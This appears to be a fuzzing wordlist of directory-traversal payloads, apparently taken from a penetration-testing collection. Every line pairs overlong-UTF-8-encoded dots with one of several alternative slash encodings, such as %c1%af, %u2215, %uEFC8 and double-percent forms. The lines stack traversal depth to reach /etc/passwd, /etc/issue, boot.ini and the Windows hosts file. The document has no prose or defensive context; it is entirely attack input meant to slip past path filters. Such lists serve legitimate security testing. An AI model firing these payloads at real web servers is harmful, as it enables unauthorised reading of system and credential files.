-%f8%80%80%80%ae%f8%80%80%80%ae%c1%af%f8%80%80%80%ae%f8%80%80%80%ae%c1%af%f8%80%80%80%ae%f8%80%80%80%ae%c1%af%f8%80%80%80%ae%f8%80%80%80%ae%c1%af%f8%80%80%80%ae%f8%80%80%80%ae%c1%af%f8%80%80%80%ae%f8%80%80%80%ae%c1%afwindows%c1%afsystem32%c1%afdrivers%c1%afetc%c1%afhosts -%f8%80%80%80%ae%f8%80%80%80%ae%bg%qfetc%bg%qfpasswd -%f8%80%80%80%ae%f8%80%80%80%ae%bg%qfetc%bg%qfissue -%f8%80%80%80%ae%f8%80%80%80%ae%bg%qfboot.ini -%f8%80%80%80%ae%f8%80%80%80%ae%bg%qfwindows%bg%qfsystem32%bg%qfdrivers%bg%qfetc%bg%qfhosts -%f8%80%80%80%ae%f8%80%80%80%ae%bg%qf%f8%80%80%80%ae%f8%80%80%80%ae%bg%qfetc%bg%qfpasswd -%f8%80%80%80%ae%f8%80%80%80%ae%bg%qf%f8%80%80%80%ae%f8%80%80%80%ae%bg%qfetc%bg%qfissue -%f8%80%80%80%ae%f8%80%80%80%ae%bg%qf%f8%80%80%80%ae%f8%80%80%80%ae%bg%qfboot.ini -%f8%80%80%80%ae%f8%80%80%80%ae%bg%qf%f8%80%80%80%ae%f8%80%80%80%ae%bg%qfwindows%bg%qfsystem32%bg%qfdrivers%bg%qfetc%bg%qfhosts -%f8%80%80%80%ae%f8%80%80%80%ae%bg%qf%f8%80%80%80%ae%f8%80%80%80%ae%bg%qf%f8%80%80%80%ae%f8%80%80%80%ae%bg%qfetc%bg%qfpasswd -%f8%80%80%80%ae%f8%80%80%80%ae%bg%qf%f8%80%80%80%ae%f8%80%80%80%ae%bg%qf%f8%80%80%80%ae%f8%80%80%80%ae%bg%qfetc%bg%qfissue -%f8%80%80%80%ae%f8%80%80%80%ae%bg%qf%f8%80%80%80%ae%f8%80%80%80%ae%bg%qf%f8%80%80%80%ae%f8%80%80%80%ae%bg%qfboot.ini -%f8%80%80%80%ae%f8%80%80%80%ae%bg%qf%f8%80%80%80%ae%f8%80%80%80%ae%bg%qf%f8%80%80%80%ae%f8%80%80%80%ae%bg%qfwindows%bg%qfsystem32%bg%qfdrivers%bg%qfetc%bg%qfhosts -%f8%80%80%80%ae%f8%80%80%80%ae%bg%qf%f8%80%80%80%ae%f8%80%80%80%ae%bg%qf%f8%80%80%80%ae%f8%80%80%80%ae%bg%qf%f8%80%80%80%ae%f8%80%80%80%ae%bg%qfetc%bg%qfpasswd -%f8%80%80%80%ae%f8%80%80%80%ae%bg%qf%f8%80%80%80%ae%f8%80%80%80%ae%bg%qf%f8%80%80%80%ae%f8%80%80%80%ae%bg%qf%f8%80%80%80%ae%f8%80%80%80%ae%bg%qfetc%bg%qfissue -%f8%80%80%80%ae%f8%80%80%80%ae%bg%qf%f8%80%80%80%ae%f8%80%80%80%ae%bg%qf%f8%80%80%80%ae%f8%80%80%80%ae%bg%qf%f8%80%80%80%ae%f8%80%80%80%ae%bg%qfboot.ini -%f8%80%80%80%ae%f8%80%80%80%ae%bg%qf%f8%80%80%80%ae%f8%80%80%80%ae%bg%qf%f8%80%80%80%ae%f8%80%80%80%ae%bg%qf%f8%80%80%80%ae%f8%80%80%80%ae%bg%qfwindows%bg%qfsystem32%bg%qfdrivers%bg%qfetc%bg%qfhosts -%f8%80%80%80%ae%f8%80%80%80%ae%bg%qf%f8%80%80%80%ae%f8%80%80%80%ae%bg%qf%f8%80%80%80%ae%f8%80%80%80%ae%bg%qf%f8%80%80%80%ae%f8%80%80%80%ae%bg%qf%f8%80%80%80%ae%f8%80%80%80%ae%bg%qfetc%bg%qfpasswd -%f8%80%80%80%ae%f8%80%80%80%ae%bg%qf%f8%80%80%80%ae%f8%80%80%80%ae%bg%qf%f8%80%80%80%ae%f8%80%80%80%ae%bg%qf%f8%80%80%80%ae%f8%80%80%80%ae%bg%qf%f8%80%80%80%ae%f8%80%80%80%ae%bg%qfetc%bg%qfissue -%f8%80%80%80%ae%f8%80%80%80%ae%bg%qf%f8%80%80%80%ae%f8%80%80%80%ae%bg%qf%f8%80%80%80%ae%f8%80%80%80%ae%bg%qf%f8%80%80%80%ae%f8%80%80%80%ae%bg%qf%f8%80%80%80%ae%f8%80%80%80%ae%bg%qfboot.ini -%f8%80%80%80%ae%f8%80%80%80%ae%bg%qf%f8%80%80%80%ae%f8%80%80%80%ae%bg%qf%f8%80%80%80%ae%f8%80%80%80%ae%bg%qf%f8%80%80%80%ae%f8%80%80%80%ae%bg%qf%f8%80%80%80%ae%f8%80%80%80%ae%bg%qfwindows%bg%qfsystem32%bg%qfdrivers%bg%qfetc%bg%qfhosts -%f8%80%80%80%ae%f8%80%80%80%ae%bg%qf%f8%80%80%80%ae%f8%80%80%80%ae%bg%qf%f8%80%80%80%ae%f8%80%80%80%ae%bg%qf%f8%80%80%80%ae%f8%80%80%80%ae%bg%qf%f8%80%80%80%ae%f8%80%80%80%ae%bg%qf%f8%80%80%80%ae%f8%80%80%80%ae%bg%qfetc%bg%qfpasswd -%f8%80%80%80%ae%f8%80%80%80%ae%bg%qf%f8%80%80%80%ae%f8%80%80%80%ae%bg%qf%f8%80%80%80%ae%f8%80%80%80%ae%bg%qf%f8%80%80%80%ae%f8%80%80%80%ae%bg%qf%f8%80%80%80%ae%f8%80%80%80%ae%bg%qf%f8%80%80%80%ae%f8%80%80%80%ae%bg%qfetc%bg%qfissue -%f8%80%80%80%ae%f8%80%80%80%ae%bg%qf%f8%80%80%80%ae%f8%80%80%80%ae%bg%qf%f8%80%80%80%ae%f8%80%80%80%ae%bg%qf%f8%80%80%80%ae%f8%80%80%80%ae%bg%qf%f8%80%80%80%ae%f8%80%80%80%ae%bg%qf%f8%80%80%80%ae%f8%80%80%80%ae%bg%qfboot.ini -%f8%80%80%80%ae%f8%80%80%80%ae%bg%qf%f8%80%80%80%ae%f8%80%80%80%ae%bg%qf%f8%80%80%80%ae%f8%80%80%80%ae%bg%qf%f8%80%80%80%ae%f8%80%80%80%ae%bg%qf%f8%80%80%80%ae%f8%80%80%80%ae%bg%qf%f8%80%80%80%ae%f8%80%80%80%ae%bg%qfwindows%bg%qfsystem32%bg%qfdrivers%bg%qfetc%bg%qfhosts -%f8%80%80%80%ae%f8%80%80%80%ae%u2215etc%u2215passwd -%f8%80%80%80%ae%f8%80%80%80%ae%u2215etc%u2215issue -%f8%80%80%80%ae%f8%80%80%80%ae%u2215boot.ini -%f8%80%80%80%ae%f8%80%80%80%ae%u2215windows%u2215system32%u2215drivers%u2215etc%u2215hosts -%f8%80%80%80%ae%f8%80%80%80%ae%u2215%f8%80%80%80%ae%f8%80%80%80%ae%u2215etc%u2215passwd -%f8%80%80%80%ae%f8%80%80%80%ae%u2215%f8%80%80%80%ae%f8%80%80%80%ae%u2215etc%u2215issue -%f8%80%80%80%ae%f8%80%80%80%ae%u2215%f8%80%80%80%ae%f8%80%80%80%ae%u2215boot.ini -%f8%80%80%80%ae%f8%80%80%80%ae%u2215%f8%80%80%80%ae%f8%80%80%80%ae%u2215windows%u2215system32%u2215drivers%u2215etc%u2215hosts -%f8%80%80%80%ae%f8%80%80%80%ae%u2215%f8%80%80%80%ae%f8%80%80%80%ae%u2215%f8%80%80%80%ae%f8%80%80%80%ae%u2215etc%u2215passwd -%f8%80%80%80%ae%f8%80%80%80%ae%u2215%f8%80%80%80%ae%f8%80%80%80%ae%u2215%f8%80%80%80%ae%f8%80%80%80%ae%u2215etc%u2215issue -%f8%80%80%80%ae%f8%80%80%80%ae%u2215%f8%80%80%80%ae%f8%80%80%80%ae%u2215%f8%80%80%80%ae%f8%80%80%80%ae%u2215boot.ini -%f8%80%80%80%ae%f8%80%80%80%ae%u2215%f8%80%80%80%ae%f8%80%80%80%ae%u2215%f8%80%80%80%ae%f8%80%80%80%ae%u2215windows%u2215system32%u2215drivers%u2215etc%u2215hosts -%f8%80%80%80%ae%f8%80%80%80%ae%u2215%f8%80%80%80%ae%f8%80%80%80%ae%u2215%f8%80%80%80%ae%f8%80%80%80%ae%u2215%f8%80%80%80%ae%f8%80%80%80%ae%u2215etc%u2215passwd -%f8%80%80%80%ae%f8%80%80%80%ae%u2215%f8%80%80%80%ae%f8%80%80%80%ae%u2215%f8%80%80%80%ae%f8%80%80%80%ae%u2215%f8%80%80%80%ae%f8%80%80%80%ae%u2215etc%u2215issue -%f8%80%80%80%ae%f8%80%80%80%ae%u2215%f8%80%80%80%ae%f8%80%80%80%ae%u2215%f8%80%80%80%ae%f8%80%80%80%ae%u2215%f8%80%80%80%ae%f8%80%80%80%ae%u2215boot.ini -%f8%80%80%80%ae%f8%80%80%80%ae%u2215%f8%80%80%80%ae%f8%80%80%80%ae%u2215%f8%80%80%80%ae%f8%80%80%80%ae%u2215%f8%80%80%80%ae%f8%80%80%80%ae%u2215windows%u2215system32%u2215drivers%u2215etc%u2215hosts -%f8%80%80%80%ae%f8%80%80%80%ae%u2215%f8%80%80%80%ae%f8%80%80%80%ae%u2215%f8%80%80%80%ae%f8%80%80%80%ae%u2215%f8%80%80%80%ae%f8%80%80%80%ae%u2215%f8%80%80%80%ae%f8%80%80%80%ae%u2215etc%u2215passwd -%f8%80%80%80%ae%f8%80%80%80%ae%u2215%f8%80%80%80%ae%f8%80%80%80%ae%u2215%f8%80%80%80%ae%f8%80%80%80%ae%u2215%f8%80%80%80%ae%f8%80%80%80%ae%u2215%f8%80%80%80%ae%f8%80%80%80%ae%u2215etc%u2215issue -%f8%80%80%80%ae%f8%80%80%80%ae%u2215%f8%80%80%80%ae%f8%80%80%80%ae%u2215%f8%80%80%80%ae%f8%80%80%80%ae%u2215%f8%80%80%80%ae%f8%80%80%80%ae%u2215%f8%80%80%80%ae%f8%80%80%80%ae%u2215boot.ini -%f8%80%80%80%ae%f8%80%80%80%ae%u2215%f8%80%80%80%ae%f8%80%80%80%ae%u2215%f8%80%80%80%ae%f8%80%80%80%ae%u2215%f8%80%80%80%ae%f8%80%80%80%ae%u2215%f8%80%80%80%ae%f8%80%80%80%ae%u2215windows%u2215system32%u2215drivers%u2215etc%u2215hosts -%f8%80%80%80%ae%f8%80%80%80%ae%u2215%f8%80%80%80%ae%f8%80%80%80%ae%u2215%f8%80%80%80%ae%f8%80%80%80%ae%u2215%f8%80%80%80%ae%f8%80%80%80%ae%u2215%f8%80%80%80%ae%f8%80%80%80%ae%u2215%f8%80%80%80%ae%f8%80%80%80%ae%u2215etc%u2215passwd -%f8%80%80%80%ae%f8%80%80%80%ae%u2215%f8%80%80%80%ae%f8%80%80%80%ae%u2215%f8%80%80%80%ae%f8%80%80%80%ae%u2215%f8%80%80%80%ae%f8%80%80%80%ae%u2215%f8%80%80%80%ae%f8%80%80%80%ae%u2215%f8%80%80%80%ae%f8%80%80%80%ae%u2215etc%u2215issue -%f8%80%80%80%ae%f8%80%80%80%ae%u2215%f8%80%80%80%ae%f8%80%80%80%ae%u2215%f8%80%80%80%ae%f8%80%80%80%ae%u2215%f8%80%80%80%ae%f8%80%80%80%ae%u2215%f8%80%80%80%ae%f8%80%80%80%ae%u2215%f8%80%80%80%ae%f8%80%80%80%ae%u2215boot.ini -%f8%80%80%80%ae%f8%80%80%80%ae%u2215%f8%80%80%80%ae%f8%80%80%80%ae%u2215%f8%80%80%80%ae%f8%80%80%80%ae%u2215%f8%80%80%80%ae%f8%80%80%80%ae%u2215%f8%80%80%80%ae%f8%80%80%80%ae%u2215%f8%80%80%80%ae%f8%80%80%80%ae%u2215windows%u2215system32%u2215drivers%u2215etc%u2215hosts -%f8%80%80%80%ae%f8%80%80%80%ae%u2216etc%u2216passwd -%f8%80%80%80%ae%f8%80%80%80%ae%u2216etc%u2216issue -%f8%80%80%80%ae%f8%80%80%80%ae%u2216boot.ini -%f8%80%80%80%ae%f8%80%80%80%ae%u2216windows%u2216system32%u2216drivers%u2216etc%u2216hosts -%f8%80%80%80%ae%f8%80%80%80%ae%u2216%f8%80%80%80%ae%f8%80%80%80%ae%u2216etc%u2216passwd -%f8%80%80%80%ae%f8%80%80%80%ae%u2216%f8%80%80%80%ae%f8%80%80%80%ae%u2216etc%u2216issue -%f8%80%80%80%ae%f8%80%80%80%ae%u2216%f8%80%80%80%ae%f8%80%80%80%ae%u2216boot.ini -%f8%80%80%80%ae%f8%80%80%80%ae%u2216%f8%80%80%80%ae%f8%80%80%80%ae%u2216windows%u2216system32%u2216drivers%u2216etc%u2216hosts -%f8%80%80%80%ae%f8%80%80%80%ae%u2216%f8%80%80%80%ae%f8%80%80%80%ae%u2216%f8%80%80%80%ae%f8%80%80%80%ae%u2216etc%u2216passwd -%f8%80%80%80%ae%f8%80%80%80%ae%u2216%f8%80%80%80%ae%f8%80%80%80%ae%u2216%f8%80%80%80%ae%f8%80%80%80%ae%u2216etc%u2216issue -%f8%80%80%80%ae%f8%80%80%80%ae%u2216%f8%80%80%80%ae%f8%80%80%80%ae%u2216%f8%80%80%80%ae%f8%80%80%80%ae%u2216boot.ini -%f8%80%80%80%ae%f8%80%80%80%ae%u2216%f8%80%80%80%ae%f8%80%80%80%ae%u2216%f8%80%80%80%ae%f8%80%80%80%ae%u2216windows%u2216system32%u2216drivers%u2216etc%u2216hosts -%f8%80%80%80%ae%f8%80%80%80%ae%u2216%f8%80%80%80%ae%f8%80%80%80%ae%u2216%f8%80%80%80%ae%f8%80%80%80%ae%u2216%f8%80%80%80%ae%f8%80%80%80%ae%u2216etc%u2216passwd -%f8%80%80%80%ae%f8%80%80%80%ae%u2216%f8%80%80%80%ae%f8%80%80%80%ae%u2216%f8%80%80%80%ae%f8%80%80%80%ae%u2216%f8%80%80%80%ae%f8%80%80%80%ae%u2216etc%u2216issue -%f8%80%80%80%ae%f8%80%80%80%ae%u2216%f8%80%80%80%ae%f8%80%80%80%ae%u2216%f8%80%80%80%ae%f8%80%80%80%ae%u2216%f8%80%80%80%ae%f8%80%80%80%ae%u2216boot.ini -%f8%80%80%80%ae%f8%80%80%80%ae%u2216%f8%80%80%80%ae%f8%80%80%80%ae%u2216%f8%80%80%80%ae%f8%80%80%80%ae%u2216%f8%80%80%80%ae%f8%80%80%80%ae%u2216windows%u2216system32%u2216drivers%u2216etc%u2216hosts -%f8%80%80%80%ae%f8%80%80%80%ae%u2216%f8%80%80%80%ae%f8%80%80%80%ae%u2216%f8%80%80%80%ae%f8%80%80%80%ae%u2216%f8%80%80%80%ae%f8%80%80%80%ae%u2216%f8%80%80%80%ae%f8%80%80%80%ae%u2216etc%u2216passwd -%f8%80%80%80%ae%f8%80%80%80%ae%u2216%f8%80%80%80%ae%f8%80%80%80%ae%u2216%f8%80%80%80%ae%f8%80%80%80%ae%u2216%f8%80%80%80%ae%f8%80%80%80%ae%u2216%f8%80%80%80%ae%f8%80%80%80%ae%u2216etc%u2216issue -%f8%80%80%80%ae%f8%80%80%80%ae%u2216%f8%80%80%80%ae%f8%80%80%80%ae%u2216%f8%80%80%80%ae%f8%80%80%80%ae%u2216%f8%80%80%80%ae%f8%80%80%80%ae%u2216%f8%80%80%80%ae%f8%80%80%80%ae%u2216boot.ini -%f8%80%80%80%ae%f8%80%80%80%ae%u2216%f8%80%80%80%ae%f8%80%80%80%ae%u2216%f8%80%80%80%ae%f8%80%80%80%ae%u2216%f8%80%80%80%ae%f8%80%80%80%ae%u2216%f8%80%80%80%ae%f8%80%80%80%ae%u2216windows%u2216system32%u2216drivers%u2216etc%u2216hosts -%f8%80%80%80%ae%f8%80%80%80%ae%u2216%f8%80%80%80%ae%f8%80%80%80%ae%u2216%f8%80%80%80%ae%f8%80%80%80%ae%u2216%f8%80%80%80%ae%f8%80%80%80%ae%u2216%f8%80%80%80%ae%f8%80%80%80%ae%u2216%f8%80%80%80%ae%f8%80%80%80%ae%u2216etc%u2216passwd -%f8%80%80%80%ae%f8%80%80%80%ae%u2216%f8%80%80%80%ae%f8%80%80%80%ae%u2216%f8%80%80%80%ae%f8%80%80%80%ae%u2216%f8%80%80%80%ae%f8%80%80%80%ae%u2216%f8%80%80%80%ae%f8%80%80%80%ae%u2216%f8%80%80%80%ae%f8%80%80%80%ae%u2216etc%u2216issue -%f8%80%80%80%ae%f8%80%80%80%ae%u2216%f8%80%80%80%ae%f8%80%80%80%ae%u2216%f8%80%80%80%ae%f8%80%80%80%ae%u2216%f8%80%80%80%ae%f8%80%80%80%ae%u2216%f8%80%80%80%ae%f8%80%80%80%ae%u2216%f8%80%80%80%ae%f8%80%80%80%ae%u2216boot.ini -%f8%80%80%80%ae%f8%80%80%80%ae%u2216%f8%80%80%80%ae%f8%80%80%80%ae%u2216%f8%80%80%80%ae%f8%80%80%80%ae%u2216%f8%80%80%80%ae%f8%80%80%80%ae%u2216%f8%80%80%80%ae%f8%80%80%80%ae%u2216%f8%80%80%80%ae%f8%80%80%80%ae%u2216windows%u2216system32%u2216drivers%u2216etc%u2216hosts -%f8%80%80%80%ae%f8%80%80%80%ae%uEFC8etc%uEFC8passwd -%f8%80%80%80%ae%f8%80%80%80%ae%uEFC8etc%uEFC8issue -%f8%80%80%80%ae%f8%80%80%80%ae%uEFC8boot.ini -%f8%80%80%80%ae%f8%80%80%80%ae%uEFC8windows%uEFC8system32%uEFC8drivers%uEFC8etc%uEFC8hosts -%f8%80%80%80%ae%f8%80%80%80%ae%uEFC8%f8%80%80%80%ae%f8%80%80%80%ae%uEFC8etc%uEFC8passwd -%f8%80%80%80%ae%f8%80%80%80%ae%uEFC8%f8%80%80%80%ae%f8%80%80%80%ae%uEFC8etc%uEFC8issue -%f8%80%80%80%ae%f8%80%80%80%ae%uEFC8%f8%80%80%80%ae%f8%80%80%80%ae%uEFC8boot.ini -%f8%80%80%80%ae%f8%80%80%80%ae%uEFC8%f8%80%80%80%ae%f8%80%80%80%ae%uEFC8windows%uEFC8system32%uEFC8drivers%uEFC8etc%uEFC8hosts -%f8%80%80%80%ae%f8%80%80%80%ae%uEFC8%f8%80%80%80%ae%f8%80%80%80%ae%uEFC8%f8%80%80%80%ae%f8%80%80%80%ae%uEFC8etc%uEFC8passwd -%f8%80%80%80%ae%f8%80%80%80%ae%uEFC8%f8%80%80%80%ae%f8%80%80%80%ae%uEFC8%f8%80%80%80%ae%f8%80%80%80%ae%uEFC8etc%uEFC8issue -%f8%80%80%80%ae%f8%80%80%80%ae%uEFC8%f8%80%80%80%ae%f8%80%80%80%ae%uEFC8%f8%80%80%80%ae%f8%80%80%80%ae%uEFC8boot.ini -%f8%80%80%80%ae%f8%80%80%80%ae%uEFC8%f8%80%80%80%ae%f8%80%80%80%ae%uEFC8%f8%80%80%80%ae%f8%80%80%80%ae%uEFC8windows%uEFC8system32%uEFC8drivers%uEFC8etc%uEFC8hosts -%f8%80%80%80%ae%f8%80%80%80%ae%uEFC8%f8%80%80%80%ae%f8%80%80%80%ae%uEFC8%f8%80%80%80%ae%f8%80%80%80%ae%uEFC8%f8%80%80%80%ae%f8%80%80%80%ae%uEFC8etc%uEFC8passwd -%f8%80%80%80%ae%f8%80%80%80%ae%uEFC8%f8%80%80%80%ae%f8%80%80%80%ae%uEFC8%f8%80%80%80%ae%f8%80%80%80%ae%uEFC8%f8%80%80%80%ae%f8%80%80%80%ae%uEFC8etc%uEFC8issue -%f8%80%80%80%ae%f8%80%80%80%ae%uEFC8%f8%80%80%80%ae%f8%80%80%80%ae%uEFC8%f8%80%80%80%ae%f8%80%80%80%ae%uEFC8%f8%80%80%80%ae%f8%80%80%80%ae%uEFC8boot.ini -%f8%80%80%80%ae%f8%80%80%80%ae%uEFC8%f8%80%80%80%ae%f8%80%80%80%ae%uEFC8%f8%80%80%80%ae%f8%80%80%80%ae%uEFC8%f8%80%80%80%ae%f8%80%80%80%ae%uEFC8windows%uEFC8system32%uEFC8drivers%uEFC8etc%uEFC8hosts -%f8%80%80%80%ae%f8%80%80%80%ae%uEFC8%f8%80%80%80%ae%f8%80%80%80%ae%uEFC8%f8%80%80%80%ae%f8%80%80%80%ae%uEFC8%f8%80%80%80%ae%f8%80%80%80%ae%uEFC8%f8%80%80%80%ae%f8%80%80%80%ae%uEFC8etc%uEFC8passwd -%f8%80%80%80%ae%f8%80%80%80%ae%uEFC8%f8%80%80%80%ae%f8%80%80%80%ae%uEFC8%f8%80%80%80%ae%f8%80%80%80%ae%uEFC8%f8%80%80%80%ae%f8%80%80%80%ae%uEFC8%f8%80%80%80%ae%f8%80%80%80%ae%uEFC8etc%uEFC8issue -%f8%80%80%80%ae%f8%80%80%80%ae%uEFC8%f8%80%80%80%ae%f8%80%80%80%ae%uEFC8%f8%80%80%80%ae%f8%80%80%80%ae%uEFC8%f8%80%80%80%ae%f8%80%80%80%ae%uEFC8%f8%80%80%80%ae%f8%80%80%80%ae%uEFC8boot.ini -%f8%80%80%80%ae%f8%80%80%80%ae%uEFC8%f8%80%80%80%ae%f8%80%80%80%ae%uEFC8%f8%80%80%80%ae%f8%80%80%80%ae%uEFC8%f8%80%80%80%ae%f8%80%80%80%ae%uEFC8%f8%80%80%80%ae%f8%80%80%80%ae%uEFC8windows%uEFC8system32%uEFC8drivers%uEFC8etc%uEFC8hosts -%f8%80%80%80%ae%f8%80%80%80%ae%uEFC8%f8%80%80%80%ae%f8%80%80%80%ae%uEFC8%f8%80%80%80%ae%f8%80%80%80%ae%uEFC8%f8%80%80%80%ae%f8%80%80%80%ae%uEFC8%f8%80%80%80%ae%f8%80%80%80%ae%uEFC8%f8%80%80%80%ae%f8%80%80%80%ae%uEFC8etc%uEFC8passwd -%f8%80%80%80%ae%f8%80%80%80%ae%uEFC8%f8%80%80%80%ae%f8%80%80%80%ae%uEFC8%f8%80%80%80%ae%f8%80%80%80%ae%uEFC8%f8%80%80%80%ae%f8%80%80%80%ae%uEFC8%f8%80%80%80%ae%f8%80%80%80%ae%uEFC8%f8%80%80%80%ae%f8%80%80%80%ae%uEFC8etc%uEFC8issue -%f8%80%80%80%ae%f8%80%80%80%ae%uEFC8%f8%80%80%80%ae%f8%80%80%80%ae%uEFC8%f8%80%80%80%ae%f8%80%80%80%ae%uEFC8%f8%80%80%80%ae%f8%80%80%80%ae%uEFC8%f8%80%80%80%ae%f8%80%80%80%ae%uEFC8%f8%80%80%80%ae%f8%80%80%80%ae%uEFC8boot.ini -%f8%80%80%80%ae%f8%80%80%80%ae%uEFC8%f8%80%80%80%ae%f8%80%80%80%ae%uEFC8%f8%80%80%80%ae%f8%80%80%80%ae%uEFC8%f8%80%80%80%ae%f8%80%80%80%ae%uEFC8%f8%80%80%80%ae%f8%80%80%80%ae%uEFC8%f8%80%80%80%ae%f8%80%80%80%ae%uEFC8windows%uEFC8system32%uEFC8drivers%uEFC8etc%uEFC8hosts -%f8%80%80%80%ae%f8%80%80%80%ae%uF025etc%uF025passwd -%f8%80%80%80%ae%f8%80%80%80%ae%uF025etc%uF025issue -%f8%80%80%80%ae%f8%80%80%80%ae%uF025boot.ini -%f8%80%80%80%ae%f8%80%80%80%ae%uF025windows%uF025system32%uF025drivers%uF025etc%uF025hosts -%f8%80%80%80%ae%f8%80%80%80%ae%uF025%f8%80%80%80%ae%f8%80%80%80%ae%uF025etc%uF025passwd -%f8%80%80%80%ae%f8%80%80%80%ae%uF025%f8%80%80%80%ae%f8%80%80%80%ae%uF025etc%uF025issue -%f8%80%80%80%ae%f8%80%80%80%ae%uF025%f8%80%80%80%ae%f8%80%80%80%ae%uF025boot.ini -%f8%80%80%80%ae%f8%80%80%80%ae%uF025%f8%80%80%80%ae%f8%80%80%80%ae%uF025windows%uF025system32%uF025drivers%uF025etc%uF025hosts -%f8%80%80%80%ae%f8%80%80%80%ae%uF025%f8%80%80%80%ae%f8%80%80%80%ae%uF025%f8%80%80%80%ae%f8%80%80%80%ae%uF025etc%uF025passwd -%f8%80%80%80%ae%f8%80%80%80%ae%uF025%f8%80%80%80%ae%f8%80%80%80%ae%uF025%f8%80%80%80%ae%f8%80%80%80%ae%uF025etc%uF025issue -%f8%80%80%80%ae%f8%80%80%80%ae%uF025%f8%80%80%80%ae%f8%80%80%80%ae%uF025%f8%80%80%80%ae%f8%80%80%80%ae%uF025boot.ini -%f8%80%80%80%ae%f8%80%80%80%ae%uF025%f8%80%80%80%ae%f8%80%80%80%ae%uF025%f8%80%80%80%ae%f8%80%80%80%ae%uF025windows%uF025system32%uF025drivers%uF025etc%uF025hosts -%f8%80%80%80%ae%f8%80%80%80%ae%uF025%f8%80%80%80%ae%f8%80%80%80%ae%uF025%f8%80%80%80%ae%f8%80%80%80%ae%uF025%f8%80%80%80%ae%f8%80%80%80%ae%uF025etc%uF025passwd -%f8%80%80%80%ae%f8%80%80%80%ae%uF025%f8%80%80%80%ae%f8%80%80%80%ae%uF025%f8%80%80%80%ae%f8%80%80%80%ae%uF025%f8%80%80%80%ae%f8%80%80%80%ae%uF025etc%uF025issue -%f8%80%80%80%ae%f8%80%80%80%ae%uF025%f8%80%80%80%ae%f8%80%80%80%ae%uF025%f8%80%80%80%ae%f8%80%80%80%ae%uF025%f8%80%80%80%ae%f8%80%80%80%ae%uF025boot.ini -%f8%80%80%80%ae%f8%80%80%80%ae%uF025%f8%80%80%80%ae%f8%80%80%80%ae%uF025%f8%80%80%80%ae%f8%80%80%80%ae%uF025%f8%80%80%80%ae%f8%80%80%80%ae%uF025windows%uF025system32%uF025drivers%uF025etc%uF025hosts -%f8%80%80%80%ae%f8%80%80%80%ae%uF025%f8%80%80%80%ae%f8%80%80%80%ae%uF025%f8%80%80%80%ae%f8%80%80%80%ae%uF025%f8%80%80%80%ae%f8%80%80%80%ae%uF025%f8%80%80%80%ae%f8%80%80%80%ae%uF025etc%uF025passwd -%f8%80%80%80%ae%f8%80%80%80%ae%uF025%f8%80%80%80%ae%f8%80%80%80%ae%uF025%f8%80%80%80%ae%f8%80%80%80%ae%uF025%f8%80%80%80%ae%f8%80%80%80%ae%uF025%f8%80%80%80%ae%f8%80%80%80%ae%uF025etc%uF025issue -%f8%80%80%80%ae%f8%80%80%80%ae%uF025%f8%80%80%80%ae%f8%80%80%80%ae%uF025%f8%80%80%80%ae%f8%80%80%80%ae%uF025%f8%80%80%80%ae%f8%80%80%80%ae%uF025%f8%80%80%80%ae%f8%80%80%80%ae%uF025boot.ini -%f8%80%80%80%ae%f8%80%80%80%ae%uF025%f8%80%80%80%ae%f8%80%80%80%ae%uF025%f8%80%80%80%ae%f8%80%80%80%ae%uF025%f8%80%80%80%ae%f8%80%80%80%ae%uF025%f8%80%80%80%ae%f8%80%80%80%ae%uF025windows%uF025system32%uF025drivers%uF025etc%uF025hosts -%f8%80%80%80%ae%f8%80%80%80%ae%uF025%f8%80%80%80%ae%f8%80%80%80%ae%uF025%f8%80%80%80%ae%f8%80%80%80%ae%uF025%f8%80%80%80%ae%f8%80%80%80%ae%uF025%f8%80%80%80%ae%f8%80%80%80%ae%uF025%f8%80%80%80%ae%f8%80%80%80%ae%uF025etc%uF025passwd -%f8%80%80%80%ae%f8%80%80%80%ae%uF025%f8%80%80%80%ae%f8%80%80%80%ae%uF025%f8%80%80%80%ae%f8%80%80%80%ae%uF025%f8%80%80%80%ae%f8%80%80%80%ae%uF025%f8%80%80%80%ae%f8%80%80%80%ae%uF025%f8%80%80%80%ae%f8%80%80%80%ae%uF025etc%uF025issue -%f8%80%80%80%ae%f8%80%80%80%ae%uF025%f8%80%80%80%ae%f8%80%80%80%ae%uF025%f8%80%80%80%ae%f8%80%80%80%ae%uF025%f8%80%80%80%ae%f8%80%80%80%ae%uF025%f8%80%80%80%ae%f8%80%80%80%ae%uF025%f8%80%80%80%ae%f8%80%80%80%ae%uF025boot.ini -%f8%80%80%80%ae%f8%80%80%80%ae%uF025%f8%80%80%80%ae%f8%80%80%80%ae%uF025%f8%80%80%80%ae%f8%80%80%80%ae%uF025%f8%80%80%80%ae%f8%80%80%80%ae%uF025%f8%80%80%80%ae%f8%80%80%80%ae%uF025%f8%80%80%80%ae%f8%80%80%80%ae%uF025windows%uF025system32%uF025drivers%uF025etc%uF025hosts -%f8%80%80%80%ae%f8%80%80%80%ae%%32%%66etc%%32%%66passwd -%f8%80%80%80%ae%f8%80%80%80%ae%%32%%66etc%%32%%66issue -%f8%80%80%80%ae%f8%80%80%80%ae%%32%%66boot.ini -%f8%80%80%80%ae%f8%80%80%80%ae%%32%%66windows%%32%%66system32%%32%%66drivers%%32%%66etc%%32%%66hosts -%f8%80%80%80%ae%f8%80%80%80%ae%%32%%66%f8%80%80%80%ae%f8%80%80%80%ae%%32%%66etc%%32%%66passwd -%f8%80%80%80%ae%f8%80%80%80%ae%%32%%66%f8%80%80%80%ae%f8%80%80%80%ae%%32%%66etc%%32%%66issue -%f8%80%80%80%ae%f8%80%80%80%ae%%32%%66%f8%80%80%80%ae%f8%80%80%80%ae%%32%%66boot.ini -%f8%80%80%80%ae%f8%80%80%80%ae%%32%%66%f8%80%80%80%ae%f8%80%80%80%ae%%32%%66windows%%32%%66system32%%32%%66drivers%%32%%66etc%%32%%66hosts -%f8%80%80%80%ae%f8%80%80%80%ae%%32%%66%f8%80%80%80%ae%f8%80%80%80%ae%%32%%66%f8%80%80%80%ae%f8%80%80%80%ae%%32%%66etc%%32%%66passwd -%f8%80%80%80%ae%f8%80%80%80%ae%%32%%66%f8%80%80%80%ae%f8%80%80%80%ae%%32%%66%f8%80%80%80%ae%f8%80%80%80%ae%%32%%66etc%%32%%66issue -%f8%80%80%80%ae%f8%80%80%80%ae%%32%%66%f8%80%80%80%ae%f8%80%80%80%ae%%32%%66%f8%80%80%80%ae%f8%80%80%80%ae%%32%%66boot.ini 